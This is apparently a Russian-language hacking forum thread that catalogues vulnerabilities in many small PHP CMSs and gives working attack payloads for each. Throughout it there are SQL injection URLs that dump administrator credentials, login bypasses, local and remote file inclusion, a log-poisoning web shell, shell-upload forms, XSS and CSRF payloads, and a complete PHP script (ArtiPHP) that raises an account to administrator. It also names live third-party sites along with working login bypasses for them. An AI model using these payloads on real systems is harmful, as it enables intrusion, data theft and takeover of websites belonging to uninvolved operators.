if (!empty($username) || !empty($password)){

$query = mysql_query("SELECT id,username,password,email,fullname,permissions FROM `users` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());

$row = mysql_fetch_array($query);

....
if(mysql_numrows($query)== 1){
$_SESSION['username']=$row['username'];
$_SESSION['email']=$row['email'];
$_SESSION['fullname']=$row['fullname'];
$_SESSION['permissions']=$row['permissions'];

Target: {POST} ?login=-1'+union+select+1,2,3,4,5,6+--+&password=1[/COLOR
or ByPass:{POST} ?login=-22' or 1=1+--+&password=1

После установки сессий, есть возможность проводить инъекции практически во все файлы.Например можно сделать локальный инклуд:

File: acute-cp/options.php


$so_theme = $_POST['so_theme'];
....
$so_edit_settings = $_POST['Update'];

if(isset($so_edit_settings)){
$result = mysql_query("UPDATE `settings` SET `website_option`='$so_theme' WHERE website_setting='theme'")or die(mysql_error());
...


File: web_settings.php


$result = mysql_query("SELECT `website_option` FROM `settings` WHERE website_setting='theme'",$conn) or die(mysql_error());
$theme_name_result = mysql_fetch_row($result);
$theme_name = $theme_name_result['0'];
//$theme_directory = "themes/".$theme_name; //old code that was exploited
If(strpos($_SERVER['SCRIPT_FILENAME'],"acute-cp")){ //is in sub folder, such as admin
define("theme_directory","../themes/".$theme_name);
}else{
define("theme_directory","themes/".$theme_name);
}


File: index.php


<?php include_once("web_settings.php"); ?>
<?php include_once(theme_directory."/header.php"); ?>


Target: {POST} [COLOR=YellowGreen]acute-cp/options.php?so_theme=../../../../../../../etc/passwd%00

Enter: http://target/index.php

STACK

System for Teaching and Assessment using a Computer algebra Kernel

The STACK system is a computer aided assessment package for mathematics.

LFI example:

http://vesna.fmf.uni-lj.si/stack/documentation.php?action=/../../../../../../../etc/passwd%00&expand=13

HOME PAGE:

http://sourceforge.net/projects/stack/

Vulnerable: Stack 1.1

Продукт ChakraWeb!
Скачал отсюдо (http://www.softpedia.com/progDownload/ChakraWeb-Download-23437.html)ChakraWeb is open source CMS (Content Management System) that suitable to create small professional websites and optimize affiliate revenue.

SQL inj
mg не имеет значения!
/phpmod/news.php
Для рядового польз.:
...case 'detail':
NewsShowDetail();
break;...
...function NewsShowDetail()
{
$news_id = RequestGetValue('id', 0);
$sql = "select news_title, news_desc, news_content from news where news_id=$news_id";
$rs = DbExecute($sql);
if ($rs && !$rs->EOF)...
/_files/library/fun_utils.php
...
function RequestGetValue($var_name, $default=false, $clean=CLEAN_NO)
{
global $PhpMagicQuote;

if (isset($_REQUEST[$var_name]))
{
$out = $_REQUEST[$var_name];

if (is_string($out))
{
if ($PhpMagicQuote)
$out = stripslashes($out);
$out = trim($out);
}

if ($clean == CLEAN_SAVE)
$out = HtmlClean($out);
else if ($clean == CLEAN_ALL)
$out = HtmlCleanAll($out);
}
else
$out = $default;

return $out;
}...

Result:
http://chakra/phpmod/news.php?op=detail&id=1[SQL]&cat=3
http://chakra/phpmod/news.php?op=detail&id=-1+union+select+concat_ws%280x3a,m_name,m_password% 29,2,3+from+sysmember+limit+1,1--+&cat=3


/files/library/fun_web.php function InitSystemVars()
...
$gFolderId = RequestGetValue('cat', 0);
if ($gFolderId == 0)...

function NewsShowPage... $gPageId = 0;


DBGetFolderData($gFolderId);

$gWebPage['page_sidebar'] = RenderPageSidebar().../_files/library/fun_web.php
...function DBGetFolderData($folder_id)
{
global $gCurrentUrlPath;
global $gFolder;
global $db;
global $gReadLevel, $gWriteLevel;

if ($folder_id >= 0)
{
$sql = "select folder_lid, folder_id, folder_name, folder_label, folder_title, folder_desc, folder_keywords,
folder_robots, folder_sidebar, folder_parent, folder_show, folder_active, folder_order,
read_level, write_level, upload_by, upload_on, update_on
from web_folder where folder_id=$folder_id and folder_lid=".$db->qstr(UserGetLID());

$rs = DbExecute($sql);
if ($rs === false) DbFatalError("DBGetFolderData");
if (!$rs->EOF)
{...
/_files/library/fun_dbutils.php
...function DbFatalError($section, $msg='')
{
global $db;

if (!empty($msg))
$msg .= '. ';

$msg .= $db->ErrorMsg();

DbLogWrite($section, '.MSG:', $msg);
SystemFatalError($section, $msg);
}...
/_files/library/cls_dbase.php
...
function ErrorMsg()
{
return 'DBError('.@mysql_errno().'): '.@mysql_error();
}...
/_files/library/fun_systems.php
...function SystemFatalError($section, $msg)
{
SetDynamicContent();

$out = '<html><head><title>Fatal System Error</title>';
$out .= '</head><body>';
$out .= '<hr noshade size=2>';
$out .= 'Fatal System Error On <b>'.$section.':</b><br> '.$msg;
$out .= '<hr noshade size=2>';
$out .= 'Sorry for this unconvenience. Please report to the webmaster of this homepage.';
$out .= '</body></html>';

echo $out;

die();
}...Result:
http://chakra/phpmod/news.php?op=detail&id=1&cat=3[SQL]
http://chakra/phpmod/news.php?op=detail&id=1&cat=3+and+%281,2%29=%28select+*+from%28select+name _const%28version%28%29,1%29,name_const%28version%2 8%29,1%29%29a%29--

XSS
/phpmod/search.php
...
$q = RequestGetValue('q', '');
$p = RequestGetValue('p', 1);


$title = "<h1>"._HPAGE_SEARCH_TITLE."</h1>\n";
$content = "<p>".sprintf(_HPAGE_SEARCH_MESSAGE, $q)."</p>\n";...
Result:
http://chakra/phpmod/search.php?q=[XSS]
http://chakra/phpmod/search.php?q=%3Cscript%3Ealert%28123%29%3C%2Fscrip t%3E

SQL inj
/phpmod/link.php
$op приним. (ряд. пользователь)
...case 'show':
LinkInitVars();
LinkFormShow('add', false);
break;...

Функция RequestGetValue описана выше!
function LinkInitVars()
{
global $gWebPage;
global $gPageId;
global $gFolder, $gFolderId;


$gWebPage['from'] = '';
$gWebPage['fld_id'] = 0;
$gWebPage['fld_url'] = '';
$gWebPage['fld_title'] = '';
$gWebPage['fld_desc'] = '';
$gWebPage['fld_note'] = '';

$gPageId = RequestGetValue('id', 0);
}
...function LinkFormShow($op, $dbinit, $errmsg='')
{
global $gFolder, $gFolderId;
global $gRequestPath, $gCurrentUrlPath, $gRequestFile;
global $gWebPage;
global $gHomePageHeader, $gHomePageFooter;
global $gBaseLocalPath;
global $gHomePageUrl, $gPageNavigation;

$from = RequestGetValue('from');
if (!empty($from))
{
$gCurrentPageNavigation = '';
$gPageNavigation = array();
$gPageNavigation[] = array($gHomePageUrl.$gBaseUrlPath."/index.html", _NAV_FRONTPAGE);
$gPageNavigation[] = array($gHomePageUrl."/phpmod/cpanel.php", _NAV_CONTROL_PANEL);
$gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php", _NAV_TODO_LIST);
$gPageNavigation[] = array($gHomePageUrl."/phpmod/todo.php?op=link", _NAV_TODO_LINK);

$gWebPage['from'] = $from;
}
else
{
DBGetFolderData($gFolderId);

$gRequestPath = FindPathFromFolderId($gFolderId);
$gCurrentUrlPath = $gBaseUrlPath.$gRequestPath;
$gRequestFile = 'index.html';

$gWebPage['from'] = '';
}
...

Принтабельное поле, где именно код впадло искать ! :)
Result:
http://chakra/phpmod/link.php?op=show&cat=4[SQL]
http://chakra/phpmod/link.php?op=show&cat=4+and+0+union+select+1,2,3,4,5,6,7,8,concat_ws %280x3a,database%28%29,user%28%29,version%28%29%29 ,10,11,12,13,14,15,16,17,18--+

Продукт Micro CMS 3.5
скачать (http://www.download3000.com/download-micro-cms-count-reg-36000.html)
Micro CMS is the only program available that combines a search-engine-friendly WYSIWYG with a simple, AJAX-based content management system, making the management of your static web site incredibly easy and fast.

SQL inj
/microcms-admin-login.php
...if ($i == 0) {
$sql = '
SELECT *
FROM microcms_administrators
WHERE administrators_username = "' . $_POST['administrators_username'] . '" and
administrators_pass = PASSWORD("' . $_POST['administrators_pass'] . '")';
$user_result = mysql_query($sql);...

Класика жанра!
POST запрос:
action - "microcms-admin-login.php"
текстовое поле - "administrators_username",
поле для ввода пасса - "administrators_pass",
скрытое [ name="action" type="hidden" value="admin_login" ]

Result:
поле administrators_username = admin
поле administrators_pass = 123") or 1=1 Или в первое поле - странная ошибка!
Мы внутри! ;-)

SQL inj
/micro_cms_files/cms/revert-content.php - 3 поле принтаб
...if ($_GET['type'] == 'newer') {
$result = mysql_query('
SELECT *
FROM microcms_content_blurb_history
WHERE content_blurbs_variable = "' . $_GET['id'] . '" and
content_blurb_history_version_num = "' . $_GET['version'] . '"
ORDER BY content_blurb_history_version_num ASC
LIMIT 1');
} elseif ($_GET['type'] == 'older') {...
Result:
http://microcms/micro_cms_files/cms/revert-content.php?id=test_content[SQL]&type=newest

ы_ы, нашы админы!
http://microcms/micro_cms_files/cms/revert-content.php?id=test_content%22+union+select+1,2,gr oup_concat(concat_ws(0x3a,administrators_username, administrators_pass)%20separator%200x40),4,5+from+ microcms_administrators--+&type=newest
Забыл :
условия - mg=off

Реальные примеры:
http://www.zeturija.lt/microcms-admin-home.php
admin" or "admin"="admin" /*
пасс любой


http://www.bistroboheme.se/microcms-admin-home.php
admin" or "admin"="admin" /*
пасс любой

Product: ArtiPHP
Version: 5.0.0 Neo
Author: http://www.artiphp.com/

Blind SQL-Injection.

Need: mq=off.

File: artpublic/utilisateurs/modif_inscription.php


$prenom = htmlspecialchars($prenom);
$nom = htmlspecialchars($nom);
$login = htmlspecialchars($login);
$login2 = htmlspecialchars($_POST['login2']);
$site = htmlspecialchars($site);
$url = htmlspecialchars($url);
$ville = htmlspecialchars($ville);
$metier = htmlspecialchars($metier);
$pass = htmlspecialchars($pass);
$pass2 = htmlspecialchars($pass2);
....
if ($pass && $pass2) {
// ***** MODIF jimro ***** Ajout $passMD5 et modif requкte - 28/10/2005
$passMD5 = md5($pass);
$requete = "UPDATE " . ARTI_PREFIX_TB . "utilisateurs SET prenomUtilisateur='$prenom', nomUtilisateur='$nom', passUtilisateur=password('$pass'), passUtilisateurMD5='$passMD5', loginUtilisateur='$login2', siteUtilisateur='$site', urlUtilisateur='$url', villeUtilisateur='$ville', metierUtilisateur='$metier' WHERE id_utilisateur='$SESSION_ID'";
...

Target:
Expl0it:

<?php

/**
* @author m0hze
* @copyright 2010
* @{http://forum.antichat.net}
* @ Yeeeees, baby!
*/
$host = 'target.com'; // URl target host example.com, don't use / (slash))!
$path = '/'; // Path to target folder
$login = 'YouLogin'; // Enter you login
$password = 'Password?'; // Enter you password
$newpass = 'NewPassword :)'; // This is you new password, for you account
$groupid = 1; // You new GROUPID, 1 = administrator.
function auth($login, $password) // Function auth on site, and get cookie

{
global $host, $path, $authscript;
$newpath = $path . 'artpublic/includes/verif_user.php';
$data = 'login=' . $login . '&pass=' . $password;
$fp = fsockopen($host, 80);
fputs($fp, "POST $newpath HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data);
while (!feof($fp)) {
$result .= fgets($fp, 128);
}
if (stripos($result, "index.php")) {
preg_match('#Set-Cookie:(.*);#iU', $result, $match);
//list($name,$value) = explode('=',$match[1]);
echo ("Authorisation: COMPLETE!...");
return (trim($match[1]) . ';');
} else {
die("Authorisation: FAILED!");
}
}
function exploit($cookie) // Function exploit, change you group, password.

{
global $host, $path, $authscript, $newpass, $groupid, $login;
$newpath = $path . 'artpublic/utilisateurs/modif_inscription.php';
$data = "prenom=HelloByExploit&nom=HelloByExploit&login2=$login',id_ugroup='".$groupid."',passUtilisateur=PASSWORD('" .
$newpass . "'),passUtilisateurMD5='" . md5($newpass) .
"'+where+loginUtilisateur='" . $login . "'+--+&login=$login&pass=1234&pass2=1234";
$fp = fsockopen($host, 80);
fputs($fp, "POST $newpath HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "Referer: $referer\r\n");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: " . strlen($data) . "\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data);

echo '<br>Login: ' . $login;
echo '<br>Password: ' . $newpass;
}
exploit(auth($login, $password));

?>

Продукт SiMan CMS 1.5

скачать тут (http://siman.org.ua/index.php?m=content&d=view&cid=7)

SQL inj
index.php
...
$_getvars=$_GET;
$_postvars=$_POST;
$_cookievars=$_COOKIE;
$_servervars=$_SERVER;
$_uplfilevars=$_FILES;
...
...$module=$_getvars["m"];
$mode=$_getvars["d"];

$special['sql']['count']=0;

if (count($_getvars)==0)
$special['is_index_page']=1;

if (empty($module) || strpos($module, ':') || strpos($module, '.') || strpos($module, '/') || strpos($module, '\\'))...
...if ($module<>'404') include('modules/'.$module.'.php');...
/modules/account.php
...$modules[$modules_index]["module"]='account';
$modules[$modules_index]["title"]=$lang["register"];
$login=$_postvars["p_login"];
$password=$_postvars["p_password"];
$password2=$_postvars["p_password2"];......sql="SELECT * FROM ".$tableusersprefix."users WHERE login = '$login'";
$result=database_db_query($nameDB, $sql, $lnkDB);
$u=0;
while ($row=database_fetch_object($result))
{
if (strcmp($row->login, $login)==0)
{
$u=1;
}
}
if ($u!=1)
{
include('ext/register.php');
}
if ($u==1)...Условие:
mg=off

durability and result:
action="index.php?m=account&d=login" , метод post
поле login_d [SQL]
поле passwd_d
Тулим:
login_d = admin' or 1=1/*
разные вариации /*, -- # ... , просто есть beta версия CMS :)
Мы внутри!

Реальный пример:
http://my-tut.org.ua/index.php?m=account&d=login
login_d admin' or 1=1 --
passwd_d безразницы!

Product: JaF CMS
Version: 4.0
Author: http://jaf-cms.sourceforge.net/

Remote File Inclusion

Need: register_globals = on;

File: /module/forum/main.php


if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
if(!isset($csv_include))require($website.$main_dir ."inc/csvfile.php");
if(!isset($fd))require($website.$main_dir."inc/functions.php");
...


Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=http://google.com%00

and:

File: /module/forum/forum.php


if(!isset($csv_include))require($website.$main_dir ."inc/csvfile.php");
if(!isset($fd))require($website.$main_dir."inc/functions.php"); ?>


....

If, allow_url_include = off, use this:

Code Exec

File: online.php


if(getenv("HTTP_CLIENT_IP")) {

$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
echo 'f';
$ip = getenv("HTTP_X_FORWARDED_FOR");
} else {
$ip = getenv("REMOTE_ADDR");
}
...
$user_write = fopen("$log_file", "w");
fputs($user_write , $to_write );
fclose($user_write );


First step, enter you browser this url:

http://targethost.com/online.php, and send this headers:


Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
X-Forwarded-For: <?php system($_GET[sec]); ?>


Ok, next step - include log-file.

Target: http://targethost.com/module/forum/main.php?category=1&id=1&website=../files/visitors%00&sec=dir

Чесно скажу >стыдно постить< - каменный век, но все же:
Продукт netious-cms-serv-0.4
Сайт : http://www.netious.com/

SQL inj
/[путь админки указ. при установке далее -1-]/index.php
...$result=mysql_query("SELECT AdminId FROM mycmsadmin WHERE username='$username' and password='".sha1($password)."'");
$row=mysql_fetch_row($result);
$num_rows = mysql_num_rows($result);...
Result:
username admin' or 1=1--
пасс любой!
Внутри :)

SQL inj
/index.php
...$saction="deny";
if ($sresult=mysql_query("SELECT Secured FROM pages WHERE PageId='$pageid'"))
{$srow=mysql_fetch_row($sresult);...
Result:
http://netious/index.php?pageid=1[SQL]http://netious/index.php?pageid=1'+and+0+union+select+1,version() ,3--+Условия:
register_globals=on
magic_quotes=off

XSS + SQL inj
[-1-]/addtomenuResponse.php
...mysql_query("INSERT into pages VALUES ('','$refid','$name','$thisdescription','$thiskeyw ords','$alias','0','$pagetype','','$pagesecured')")
or die("Something went wrong: <br />".mysql_error());...include.php...function commonheader($pageid,$title,$keywords,$description ,$forcedid)
{
if ($pageid!="-1" && $pageid!="contact")
{
$result=mysql_query("SELECT Name, Keywords, Description FROM pages WHERE PageId='$pageid'");
$row=mysql_fetch_row($result);
$name=$row[0];
$thiskeywords=$row[1];
$thisdescription=$row[2];
if ($forcedid=="no") {$title="$name :: $title";}...
echo "
<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"
\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">
<html xmlns=\"http://www.w3.org/1999/xhtml\">
<head>
<title>$title</title>...Дырявый как # :)

Product: VarioCMS
Version: 0.5.6
Author:: http://sourceforge.net/projects/variocms/

SQL-Inj

Need: mq=off;

File: /plugins/system/slideshow/upload.php


if (isset($_GET['album_id'])) {
$album_id = $_GET['album_id'];
}
....
$sql_insert = "INSERT INTO " . $db_plugin_prefix . "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')";
fputs($logfile, "$sql_insert\n");


Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}.
Columns: 7

Upload Shell

Need: none.

File: /plugins/system/slideshow/upload.php


if (isset($_GET['album_id'])) {
$album_id = $_GET['album_id'];
}
..
foreach ($_FILES as $file => $fileArray) {
echo("File key: $file\n");
foreach ($fileArray as $item=>$val) {

}

//Let's manipulate the received file: in this demo, we just want to remove it!
$new_dir = $slideshow_path . $album_id;
if (file_exists($new_dir) == false) {
mkdir ($new_dir);
mkdir ($new_dir . "/fullsize");
mkdir ($new_dir . "/slideshow");
mkdir ($new_dir . "/thumbnails");
}

$upload_dir = $slideshow_path . $album_id . "/";
$position = 65000;
if (move_uploaded_file($fileArray['tmp_name'], $upload_dir . uml2nouml($fileArray['name']))) {


Target:
Expl0it ^_^:

<form enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="album_id" value="../../"/>
</form>

album_id = folder to upload shell.

Product: PithCMS
Version: 0.9.5
Author: http://sourceforge.net/projects/pithcms/

Local File Inclusion



File: newsreader.php

Need: rg=on;


include ("admin/lang/$lang");
include ("_read_config.inc.php");
include_once ("inc/cleaner.inc.php");


Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd

File: admin/blog.php

Need:logged on target site!


session_start();
if (!isset($_SESSION['user'])) {
echo "<h2>ACCESS DENIED AND LOGGED</h2>";
exit;
}
...
f (isset($_POST['filename'])) {
//include ("$rootdir/articles/".$_POST['filename']);
include ("../news/".$_POST['filename']);
}else{
...


Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd

Remove arbitrary file

File: admin/download_remove.php

Need: logged on target site!


if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) {
$file = trim($_POST['file']);
$object = ("../downloads/$file");


Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php

MusicBox v3.3

SQL Injection:

/blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+
/genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7+--+

Пассивная XSS:

/index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert(document.cookie);%3 C/sсriрt%3EE&action=search&start=0&x=0&y=0
/index.php?action=top&show=5&type=Artists+order+by+1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E

Активная XSS:

/member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt>


По идеи почти каждый параметр уязвим.

/phpinfo.php ;)

Product: pepsi 0.6
download: http://sourceforge.net/projects/pepsicms/

Remote File Inclusion


file:index.php


//very sweet
include "includes/template-loader.php";


file:includes/template-loader.php


//include( 'classes/theme_engine/engine.php' );
include( $_Root_Path . 'classes/Smarty.class.php' );


result:

if allow_url_include On

/index.php?_Root_Path=http://ya.ru/%00
or
/index.php?_Root_Path=[file]%00

http://www.kcms.cz/
K:CMS v.2.1.1
LFI, плохо что в админке!
/admin.php...if (isset($_GET["function"])) {
include "components/pages_admin/".$_GET["function"].".php";...Result:
http://kcms/admin.php?function=options[lfi]
Example:
http://kcms/admin.php?function=options/../../../robots.txt

Бред, но напишу):
http://aphpkb.org/
Andy's PHP Knowledgebase v0.94.6 © Andy Grayndler 2010
XSS
/textarea.php
<?php //textarea.php -- default textarea
echo '<textarea name="' . $textareaname . '" style="width:95%; height:300px">' .
$textareacontent . '</textarea>';
?>Условие:
rg=on

Результат:
http://site/textarea.php?textareacontent=</textarea>[xss]
http://localhost/know/textarea.php?textareacontent=</textarea><script>alert(123)</script>
И куча других скриптов. Не буду бред постить!

SQL inj
/a_authord.php - даные о пользователях!
...include('./functions.php');
require_once ('./config/auth.php');
require ('./config/config.php');
include"./config/dbsettings.php";

$num = $_GET[aid];
$query = "SELECT CONCAT(FirstName, ' ', LastName) AS name, UserName, Email, DATE_FORMAT(RegistrationDate, '%M %d, %Y') AS dr FROM authors WHERE AuthorID='{$num}'";...
Уловия:
- админка;
- mg=off.

Резльутат:
http://site/a_authord.php?aid=1[sql]
http://site/a_authord.php?aid=1%27+union+select+1,version%28%2 9,3,4--+

BlogME
Product : BlogME 1.1

SQL injection
file : index.php
mq = off
http://x60unu/index.php?month=4&year=2007'+and+0+union+all+select+version(),versio n(),3,4,5,6,7,8--+
http://x60unu/index.php?cat=General'+and+0+union+all+select+1,2, 3,4,5,6,7,8--+
http://x60unu/index.php?when=March%206,%202007'+and+0+union+all+ select+1,2,3,4,5,6,7,8--+
SQL in Admin Panel
file : blogroll.php
case 'edit' :

$sqledit= "SELECT * FROM ". $prefix ."_blogroll WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
http://x60unu/blogroll.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
$sqldelete= "DELETE FROM ". $prefix ."_blogroll where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
result :
http://x60unu/blogroll.php?mode=delete&id=1[blind sql]
file : category.php

$sqledit= "SELECT * FROM ". $prefix ."_cat WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result:
http://x60unu/category.php?mode=edit&id=1+and+0+union+all+select+1,2--+
blind sql
sqldelete= "DELETE FROM ". $prefix ."_cat where id=$id";
$resultdelete = db_query($dbname,$sqldelete)
result :
http://x60unu/category.php?mode=delete&id=1[blind sql]
file : links.php

$sqledit= "SELECT * FROM ". $prefix ."_links WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
http://x60unu/links.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
$sqldelete= "DELETE FROM ". $prefix ."_links where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
http://x60unu/links.php?mode=delete&id=1[blind sql]

Active Xss
comments --- text comments --- "><script>alert();</script>


з.ы. двиг сплошная дыра :(

Продукт:: AEF (форумный движок)
Сайт:: http://www.anelectron.com
Дорк:: "Powered by AEF" (250 000 результатов)
Уязвимость:: Активная XSS.
Уязвимость присутствует из-за небезопасной обработки BB-тегов.
Можно вызвать разрушение тегов, и, как следствие, выполнение javascript-кода.
Пример эксплуатации:

[*url]http://asd.asd[*email]asd@asd.asd onmouseover=alert() bla=[*/email][*/url]

На выходе получаем:

<a href="http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a>" target="_blank">http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a></a>

Можно также провести атаку через стили (для ie и ff), тогда можно спрятать куски разрушенного тега:

[*url]http://asd.asd[*email]asd@asd.asd style=display:none;olo:expression(alert());-moz-binding:url() bla=[*/email][*/url]

Продукт:: Beehive (форумный движок)
Сайт:: http://beehiveforum.sourceforge.net/
Дорк:: "Project Beehive Forum" (?)
Уязвимость:: Активная XSS.
Уязвимость существует из-за недостаточной фильтрации слова javascript в сообщении.
Строчка из /include/fixhtml.php (скрипт "безопасной" обработки html):
$attrib_value = preg_replace("/javascript:/ixu", '', $attrib_value);
В движке разрешён html, а это ограничение обходится простым кодированием html (протокол от этого валидность не теряет):
<img src="javascript:alert()" />

Продукт:: CompactCMS
Сайт:: http://www.compactcms.nl
Дорк:: "Maintained with CompactCMS"
//тут была глупая ошибка, Strilo4ka заметил...
Уязвимость:: Исполнение произвольного кода.
Требования: права админа (админка по умолчанию не запаролена - /admin)
Жмём Create a new page, создаём страничку с php-кодом, затем она инклудится, и мы имеем шелл.

AneCMS
Product : Demo AneCMS v1

Blind SQL injection
http://demo.anecms.com/blog/delete/1/1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/
Active XSS
comments blog news - "><script>alert();</script>
http://anecms.com/blog/5/Template_Engine_and_cleaning_time
LFI
rss.php
if(isset($_GET['module']))
include './modules/'.$_GET['module'].'/rss.php';
http://x60unu/rss.php?module=../[file]%00
Admin panel
include './pages/'.$_GET['p'].'.php';
http://demo.anecms.com/acp/?p=lfi
http://x60unu/acp/index.php?p=../../[file]%00
Путь
http://demo.anecms.com/register/next

Дыр тут много :(

phpwcms v1.4.5
release 2010

Скачано отсюдо (http://www.phpwcms.de/)!

XSS + HPP
/image_zoom.php..if(empty($_GET["show"])) {

$width_height = '';
$img = "img/leer.gif";

} else {

$img = base64_decode($_GET["show"]);
list($img, $width_height) = explode('?', $img);
$img = str_replace(array('http://', 'https://', 'ftp://'), '', $img);
$img = strip_tags($img);
$width_height = strip_tags($width_height);
$img = PHPWCMS_IMAGES.urlencode($img);......<a href="#" title="Close PopUp" onclick="window.close();return false;"><img src="<?php echo $img ?>" alt="" border="0" <?php echo $width_height ?> /></a>...Result:
1) формируем код, example: адрес_рисунка?onmouseover=alert(1)
2) переводим в base64 - MDRANUFfQDhBQz06MD9vbm1vdXNlb3Zlcj1hbGVydCgxKQ==
3) тулим эту строку гетом в show.

ps админка - /login.php
По умолчанию:
логин - admin;
пасс - phpwcms (md5).

AneCMS

Продолжение поста [x60]unu.
RFI
ajax.php!
<?php
include './system/pages/essential.php';
if(isset($_POST['p']))
include $_POST['p'];
?>Условие:
allow_url_include = On

Експлуатация:
<form method="POST" action="http://localhost/anecms/ajax.php">
<input type="text" name="p" />
<input type="submit" /></form>

WebsiteBaker 2.8.1
Sql-injection(требования register_globals=on)

if(isset($_GET['page_id']) AND is_numeric($_GET['page_id'])) {
$page_id = $_GET['page_id'];
} else {
header('Location: /');
exit(0);
}
if(isset($_GET['group_id']) AND is_numeric($_GET['group_id'])) {
$group_id = $_GET['group_id'];
define('GROUP_ID', $group_id);
}

/*--*/
if(isset($group_id)) {
$query = "SELECT * FROM ".TABLE_PREFIX."mod_news_posts WHERE group_id=".$group_id." AND page_id = ".$page_id." AND active=1 AND ".$time_check_str." ORDER BY posted_when DESC";
} else {


эксплуатация:
/modules/news/rss.php?page_id=2&group_id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14,15--+


Способов залиться несколько:
1)В админке аплоадим зип архив с шеллом, распаковываем средствами админ-панели.
2)аплоадим какой-нибудь shell.php.xs(если apache в качестве вебсервера)

Rat CMS

SQL ing
login.php
...$userId = $_POST['txtUserId'];
$password = $_POST['txtPassword'];

// check if the user id and password combination exist in database
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";

$result = mysql_query($sql) or die('Query failed. ' . mysql_error());

if (mysql_num_rows($result) == 1) {
// the user id and password match,
// set the session
$_SESSION['db_is_logged_in'] = true;

// after login we move to the main page
header('Location: main.php');
exit;
} else {
$errorMessage = 'Sorry, wrong user id / password';
}...Result :
в поле txtUserId - ' union select 1--[ ]

Условие:
mg=off

Далее привожу только код других файлов:
viewarticle.php , viewarticle2.php...else {
// get the article info from database
$query = "SELECT title, content FROM news WHERE id=".$_GET['id'];
$result = mysql_query($query) or die('Error : ' . mysql_error());
$row = mysql_fetch_array($result, MYSQL_ASSOC); ...

basic cms

CSRF + SQL inj(в админке!)
просто выношу потому что редкий интересный случай1
Admin/Pages/List.php...
$strAction=QuerySafeString($_POST["txtAction"]);
}
if ($_SESSION["Admin"] =="Y")
{
$conclass =new DataBase();
if ($strAction=="DEL")
{
if (isset($_POST['chkSelect']))
{
$strSelection=$_POST['chkSelect'];
$strSQL="DELETE FROM pages_t_details WHERE id IN(". join(',', $strSelection) . ")";
//print $strSQL;
$strErrorMessages="";
$var1=$conclass->Execute ($strSQL,$strErrorMessages);
}...Includes/Database.php...
function QuerySafeString($pstrString)
{
$badChars = array("\'");
$newChars = array("'");

$pstrString = str_replace($badChars, $newChars, $pstrString);
$pstrString=killChars($pstrString);
return $pstrString;
}...Includes/Database.php
...function killChars($strWords)
{

$badChars = array("select", "drop", ";", "--", "insert", "delete","Update");
$newChars = array("", "", "", "", "", "", "");

$strWords = str_replace($badChars, $newChars, $strWords);
return $strWords;

}...Вывод ошибки от СУБД
Includes/Database.php...
function Execute($strSQL,$strErrorMessages)
{
$result = mysql_query($strSQL) or die("Query failed : " . mysql_error());
return $result;

}...Result:
<FORM action="http://localhost/basiccms/Admin/Pages/List.php?txtAction=" method="POST">
<INPUT type="checkbox" name="chkSelect[]" id="chkSelect[]" value="666" checked>
<INPUT type="checkbox" name="chkSelect[]" id="chkSelect[]" value="(Select * from (Select name_const(version(),1),name_const(version(),1))x)" checked>
<INPUT type="checkbox" name="txtAction" value="DEL" checked>
<input type=submit value="inj">
</FORM>

SQL inj
Admin/Pages/AddModifyInput.php
